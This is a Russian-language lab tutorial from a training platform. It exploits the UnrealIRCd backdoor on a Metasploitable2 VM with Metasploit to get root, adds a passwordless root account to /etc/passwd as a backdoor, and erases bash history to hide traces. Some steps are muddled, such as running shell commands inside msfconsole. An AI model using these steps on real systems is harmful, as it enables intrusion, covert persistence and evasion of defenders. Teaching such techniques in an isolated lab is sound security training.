Введение
В этой лабораторной работе мы научимся создавать бэкдор и очищать следы после успешного получения доступа к целевой машине в ходе атаки. Сценарий развернут в среде LabEx, где мы будем использовать терминал Kali для эксплуатации уязвимостей на целевой машине Metasploitable2, получения root-доступа, создания бэкдора для будущего доступа и удаления всех следов, оставленных в процессе атаки.
Получение root-доступа к целевой машине
На этом этапе мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа к целевой машине.
Теперь вы запустите машину для атаки (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.
Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2
Дождитесь запуска целевой машины, это может занять 1-3 минуты.
Проверьте соединение с целевой машиной с помощью команды ping:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
Запустите контейнер Kali Linux и войдите в среду bash, выполнив:
docker run -ti --network host b5b709a49cd5 bash
Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
Теперь машина для атаки и целевая машина запущены, и вы можете начать тестирование на проникновение.
Примечание: Если вы случайно выйдете из текущего bash, контейнер Kali автоматически остановится. Вы можете снова выполнить docker run -ti --network host b5b709a49cd5 bash на хосте, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
В контейнере Kali Linux введите следующие команды в терминале bash:
service postgresql start
msfdb init
cd ~
msfconsole
Это запустит службу базы данных PostgreSQL, инициализирует базу данных и откроет консоль Metasploit Framework (msfconsole) для дальнейших операций.
Найдите модуль уязвимости Unreal Ircd:
search unreal_ircd
Используйте модуль unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
Установите IP-адрес цели:
set RHOST 192.168.122.102
Выберите полезную нагрузку (payload) bind shell для этого модуля:
set PAYLOAD cmd/unix/bind_perl
Проэксплуатируйте уязвимость, чтобы получить доступ:
exploit
Проверьте текущего пользователя:
whoami
Вы должны увидеть, что получили root-доступ к целевой машине.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку
Создание бэкдора
На этом этапе, получив root-доступ, давайте создадим бэкдор для будущего доступа к целевой машине.
Прежде всего, если вы не находитесь в консоли Metasploit, запустите её:
cd ~
msfconsole
Затем проверьте информацию о системе:
uname -a
Найдите расположение bash пользователя root:
cat /etc/passwd
Создайте учетную запись бэкдора без пароля:
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd
Проверьте создание учетной записи бэкдора:
cat /etc/passwd
Вы должны увидеть новую учетную запись shiyanlou1234 в выводе.
Откройте новый терминал и подключитесь к целевой машине, используя учетную запись бэкдора:
telnet 192.168.122.102
Введите имя пользователя shiyanlou1234 при появлении запроса.
Проверьте текущего пользователя:
whoami
Вы должны увидеть, что вошли в систему как пользователь бэкдора.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку
Очистка следов
На этом этапе, после получения доступа и создания бэкдора, важно очистить все следы, оставленные в процессе атаки, чтобы избежать обнаружения.
Прежде всего, если вы не находитесь в консоли Metasploit, запустите её:
cd ~
msfconsole
Один из распространенных способов очистки следов — удаление истории команд. История хранится в файле .bash_history. Вы можете очистить историю с помощью следующей команды:
history -c
Чтобы очистить файл .bash_history, вы можете найти его местоположение с помощью команды find:
find / -name .bash_history
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку
Резюме
В этой лабораторной работе мы узнали, как получить root-доступ к целевой машине с помощью уязвимости Unreal Ircd, создать учетную запись бэкдора для будущего доступа и очистить следы, оставленные в процессе атаки. Этот практический опыт поможет вам понять методы, используемые злоумышленниками для поддержания постоянного доступа и сокрытия своих действий после успешного проникновения.



